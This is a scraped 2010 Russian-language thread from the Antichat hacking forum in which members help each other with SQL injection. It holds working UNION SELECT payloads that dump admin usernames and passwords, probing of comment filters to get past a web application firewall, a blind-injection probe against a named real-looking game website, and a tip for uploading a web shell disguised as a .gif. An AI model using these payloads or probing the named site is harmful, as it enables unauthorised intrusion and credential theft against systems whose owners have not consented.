Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
13.06.2010, 00:09
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от Irdis
несколько вопросов
1.
section=113+union+select 1 from w
на что получаю ответ.
DB Error: Table 'xxx.w' doesn't exist....
Смысл ошибки понятен, но почему такое странное имя таблицы, если я выбирал из w?
2. .... INTO Outfile char(11,22)
почему это ошибка, char вроде должен возвращать строку
3. server version for the right syntax to use near ''(две кавычки) at line 1
Ответ от БД, если вставляю кавычку в запрос. Почему такое происходит? Есть ли возможность это обойти?
1. xxx это имя текущей базы
2. в запросе into outfile char не катит
3.кавычки фильтруются,синтаксическа ошибка mysql
|
|
|
13.06.2010, 00:12
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Konqi, а нажать кнопочку "Edit" религия не позволяет?
PS: FlaktW, насколько я знаю, в MySQL регистр не важен.
|
|
|
|
13.06.2010, 00:15
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074
Репутация:
257
|
|
Сообщение от GOGA075
FlaktW
information_schema и есть таблица..
Проше сделать прямой запрос, чем так извращатся!!
\
Сообщение от [Feldmarschall]
не таблица, а содержащая информацию о структуре баз данных.
Если быть точнее, то это БД => база данных 
Сообщение от FlaktW
Вопрос! Можно ли вывести из таблицы ADMIN, через information_schema, значения колонок USERNAME,PASSWORD?
id=-11'+union+select+1,concat_ws(0x3a,USERNAME,PASSWOR D),3,4,5,6,7,8,9,10,11,12+from+information_schema. tables+where+table_name=0x41444d494e+--+
Сообщение от CyberHunter
Хм.. Странный вопрос. Наверное можно, если там есть такие колонки.
Сообщение от GOGA075
FlaktW
зачем тебе именно через information_schema выводить??
information_schema и есть таблица.. и ничего от туда кроме имен не выведешь...
Проше сделать прямой запрос, чем так извращатся!!
Сообщение от FlaktW
Надо поизвращаться, прямой запрос не проходит!
Вот эта переписка, вообще как будто из фильма "Чужие 3".
Самое главное пытаются использвать "умные" слова, но по смыслу такой чес получается. А самое печальное, что на глупый вопрос, другие вроде бы не глупые люди (хотя может я ошибаюсь), пытаются найти глупый ответ.
Сообщение от Twoster
Покажи плиз запрос, которым ты вывел данные.
На баш хочешь?
зы. Как я понял, правильный запрос был такой.
union+select+1,concat_ws(0x3a,username,password),3 ,4,5,6,7,8,9,10,11,12+from+admin, т.е. в нижнем регистре. Но то как искали решение, меня просто убило
Последний раз редактировалось v1d0qz; 13.06.2010 в 00:22..
|
|
|
|
13.06.2010, 00:18
|
|
Новичок
Регистрация: 17.04.2010
Сообщений: 15
Провел на форуме:
48171
Репутация:
3
|
|
подскажите, пожалуйста.
на сервере IIS, и, как я понял, ODBC (вообщем, там MySQL).
myguild.asp?gid=2779-1 - не проходит
myguild.asp?gid=2779' - ошибка:
Код:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[MySQL][ODBC 3.51 Driver][mysqld-5.0.24a]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1
/myguild/myguild_common.asp, line 7
myguild.asp?gid=2779+order+by+1/* - проходит
myguild.asp?gid=2779+order+by+1-- - не проходит, т.е. -- фильтрует, а /* нет.
Но когда я делаю такое: myguild.asp?gid=2779+union+select+1/* , сервер выдает алерт:
Код:
Alert
Your request triggered an alert! If you feel that you have received this page in error, please contact the administrator of this web site.
что можно сделать? |
|
|
|
13.06.2010, 00:23
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224
Репутация:
388
|
|
2z-kzn-z, https://forum.antichat.ru/thread30501.html
это не MySQL, a MSSQL, другой синтаксис
|
|
|
|
13.06.2010, 00:27
|
|
Новичок
Регистрация: 17.04.2010
Сообщений: 15
Провел на форуме:
48171
Репутация:
3
|
|
Сообщение от Bb0y
2z-kzn-z, https://forum.antichat.ru/thread30501.html
это не MySQL, a MSSQL, другой синтаксис
хм, а почему тогда
Код:
[MySQL][ODBC 3.51 Driver][mysqld-5.0.24a]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1
?
|
|
|
|
13.06.2010, 00:31
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Значит так, дорогие друзья. Мы тут почитали посты за сегодняшний день, и я решил ужесточить на время летних каникул модерацию данного топика.
В связи с этим знаменательным событием прошу постоянных читателей и писателей думать что вы пишите, а в часности:
Задающим вопросы - воспользоваться поиском и что-то сначала почитать
Отвечающим на вопросы - хорошенько подумать перед ответом. Не нужно показывать свою некомпетентность и писать ОХИНЕЮ отвечая на вопросы, я буду расценивать это как подрыв доверия к форуму в целом (вот такой я наркоман !)
===============================================
Далее, хотелось-бы услышать пояснения к некоторым ответам. В часности:
Сообщение от GOGA075
И попробуй переименовать шел в shell.php$20.gif и залить это, может прокатить!
поясните пожалуйста, что это за конструкция
Сообщение от CyberHunter
Хм.. Странный вопрос. Наверное можно, если там есть такие колонки.
вот структура INFORMATION_SCHEMA, где там прячутся те поля, которые он хочет вывести?
http://www.rldp.ru/mysql/mysqlpro/schema.htm
Сообщение от FlaktW
Колонки такие есть, а запрос не знаю, как составить.
то-же самое, где там они, покажите пожалуйста
Сообщение от Bb0y
2FlaktW, возможно в таблице нет выборки
Эээ?
Сообщение от FlaktW
Разобрался, в регистре была причина.
Всем спасибо за помощь!
ЧТО ТУТ ПРОИСХОДИТ??777!!!
===========================
Это подборка только за сегодняшний вечер!
Вобщем если это будет продолжаться, не обижайтесь на меня =\
Последний раз редактировалось Jokester; 13.06.2010 в 00:35..
|
|
|
|
13.06.2010, 00:35
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224
Репутация:
388
|
|
Действительно. Не дочитал мессагу до конца
|
|
|
|
13.06.2010, 00:43
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074
Репутация:
257
|
|
Сообщение от z-kzn-z
подскажите, пожалуйста.
на сервере IIS, и, как я понял, ODBC (вообщем, там MySQL).
myguild.asp?gid=2779-1 - не проходит
myguild.asp?gid=2779' - ошибка:
Код:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[MySQL][ODBC 3.51 Driver][mysqld-5.0.24a]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1
/myguild/myguild_common.asp, line 7
myguild.asp?gid=2779+order+by+1/* - проходит
myguild.asp?gid=2779+order+by+1-- - не проходит, т.е. -- фильтрует, а /* нет.
Но когда я делаю такое: myguild.asp?gid=2779+union+select+1/* , сервер выдает алерт:
Код:
Alert
Your request triggered an alert! If you feel that you have received this page in error, please contact the administrator of this web site.
что можно сделать? Если ты хочешь скрыть линк, то скрывай как полагается. Лугл палит 
Именно в этом запросе, что ты указал, крути как UPDATE;
http://hero2.eamobile.co.kr/myguild/myguild.asp?gid=474-1&lid=867&page=1
Сайт ватовый, нашел по быстрому блинд (с выводом нету время искать). Там действительно mysql. Но в теории под игру стоит ещё и mssql.
http://hero2.eamobile.co.kr/community.asp?cid=86488+and+substring(version(),1, 1)=5&page=1
зы. Jokester, теперь я опередил твою мысль. Правда я решил не цитировать Bb0y, вроде как парень старается (в плане на форуме), но видимо не понял что от него хотел ТС, а ты я вижу никого не пожалел. Ну и ладно...
Последний раз редактировалось v1d0qz; 13.06.2010 в 01:02..
|
|
|
|
13.06.2010, 00:46
|
|
Участник форума
Регистрация: 06.02.2006
Сообщений: 177
Провел на форуме:
1576821
Репутация:
88
|
|
3.кавычки фильтруются,синтаксическа ошибка mysql
3. хм... я всегда думал, что кавычки фильтруются на уровне кода, который посылает запросы(а не на уровне БД). А как тогда они составляют запросы, если кавычки не допустимы (понятно что можно обойтись в больших кол-вах случаев и без них, но это же убого)?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
